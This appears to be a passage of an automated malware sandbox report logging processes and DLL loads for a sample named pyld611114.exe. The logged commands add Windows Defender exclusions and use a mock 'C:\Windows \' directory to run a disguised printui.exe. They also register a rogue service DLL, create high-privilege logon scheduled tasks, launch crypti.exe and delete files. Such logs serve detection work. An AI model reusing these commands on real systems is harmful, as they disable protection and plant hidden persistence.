Source: C:\Windows \System32\printui.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath '%SystemDrive%\Windows \System32'; Add-MpPreference -ExclusionPath '%SystemDrive%\Windows\System32';"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 10 /nobreak
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'; Add-MpPreference -ExclusionPath 'C:\Windows\System32';"
Source: C:\Windows \System32\printui.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c sc create x816796 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto && reg add HKLM\SYSTEM\CurrentControlSet\services\x816796\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x816796.dat" /f && sc start x816796
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create x816796 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add HKLM\SYSTEM\CurrentControlSet\services\x816796\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x816796.dat" /f
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start x816796
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k DcomLaunch
Source: C:\Windows \System32\printui.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c start "" "C:\Windows\System32\console_zero.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\console_zero.exe "C:\Windows\System32\console_zero.exe"
Source: C:\Windows\System32\console_zero.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c schtasks /delete /tn "console_zero" /f
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /delete /tn "console_zero" /f
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'c:\windows\system32'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'c:\windows\system32'
Source: C:\Windows \System32\printui.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c timeout /t 10 /nobreak && rmdir /s /q "C:\Windows \"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 10 /nobreak
Source: C:\Windows\System32\console_zero.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
Source: unknownProcess created: C:\Windows\System32\console_zero.exe C:\Windows\System32\console_zero.exe
Source: C:\Windows\System32\console_zero.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c schtasks /delete /tn "console_zero" /f
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /delete /tn "console_zero" /f
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'E:\'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'E:\'
Source: C:\Windows\System32\console_zero.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'F:\'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'F:\'
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c start "" "c:\windows\system32\crypti.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\crypti.exe "c:\windows\system32\crypti.exe"
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c start "" "c:\windows\system32\crypti.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\crypti.exe "c:\windows\system32\crypti.exe"
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c start "" "c:\windows\system32\crypti.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\crypti.exe "c:\windows\system32\crypti.exe"
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c start "" "c:\windows\system32\crypti.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\crypti.exe "c:\windows\system32\crypti.exe"
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c start "" "c:\windows\system32\crypti.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\crypti.exe "c:\windows\system32\crypti.exe"
Source: C:\Users\user\Desktop\pyld611114.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'"Jump to behavior
Source: C:\Users\user\Desktop\pyld611114.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c start "" "C:\Windows\System32\usvcinsta64.exe"Jump to behavior
Source: C:\Users\user\Desktop\pyld611114.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c timeout /t 10 /nobreak && del "C:\Users\user\Desktop\pyld611114.exe"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\usvcinsta64.exe "C:\Windows\System32\usvcinsta64.exe" Jump to behavior
Source: C:\Windows\System32\usvcinsta64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'"Jump to behavior
Source: C:\Windows\System32\usvcinsta64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'"Jump to behavior
Source: C:\Windows\System32\usvcinsta64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c mkdir "\\?\C:\Windows \System32"Jump to behavior
Source: C:\Windows\System32\usvcinsta64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c start "" "C:\Windows \System32\printui.exe"Jump to behavior
Source: C:\Windows\System32\usvcinsta64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c timeout /t 10 /nobreak && del "C:\Windows\System32\usvcinsta64.exe"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 10 /nobreakJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows \System32\printui.exe "C:\Windows \System32\printui.exe" Jump to behavior
Source: C:\Windows \System32\printui.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath '%SystemDrive%\Windows \System32'; Add-MpPreference -ExclusionPath '%SystemDrive%\Windows\System32';"
Source: C:\Windows \System32\printui.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c sc create x816796 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto && reg add HKLM\SYSTEM\CurrentControlSet\services\x816796\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x816796.dat" /f && sc start x816796
Source: C:\Windows \System32\printui.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c start "" "C:\Windows\System32\console_zero.exe"
Source: C:\Windows \System32\printui.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c timeout /t 10 /nobreak && rmdir /s /q "C:\Windows \"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 10 /nobreak
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'; Add-MpPreference -ExclusionPath 'C:\Windows\System32';"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create x816796 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add HKLM\SYSTEM\CurrentControlSet\services\x816796\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x816796.dat" /f
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start x816796
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'c:\windows\system32'
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'E:\'
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'F:\'
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c start "" "c:\windows\system32\crypti.exe"
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c start "" "c:\windows\system32\crypti.exe"
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c start "" "c:\windows\system32\crypti.exe"
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c start "" "c:\windows\system32\crypti.exe"
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c start "" "c:\windows\system32\crypti.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\console_zero.exe "C:\Windows\System32\console_zero.exe"
Source: C:\Windows\System32\console_zero.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c schtasks /delete /tn "console_zero" /f
Source: C:\Windows\System32\console_zero.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /delete /tn "console_zero" /f
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'c:\windows\system32'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 10 /nobreak
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
Source: C:\Windows\System32\console_zero.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c schtasks /delete /tn "console_zero" /f
Source: C:\Windows\System32\console_zero.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /delete /tn "console_zero" /f
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'E:\'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'F:\'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\crypti.exe "c:\windows\system32\crypti.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\crypti.exe "c:\windows\system32\crypti.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\crypti.exe "c:\windows\system32\crypti.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\crypti.exe "c:\windows\system32\crypti.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\crypti.exe "c:\windows\system32\crypti.exe"
Source: C:\Users\user\Desktop\pyld611114.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\pyld611114.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\System32\usvcinsta64.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\System32\usvcinsta64.exeSection loaded: wtsapi32.dllJump to behavior
Source: C:\Windows\System32\usvcinsta64.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\usvcinsta64.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\timeout.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
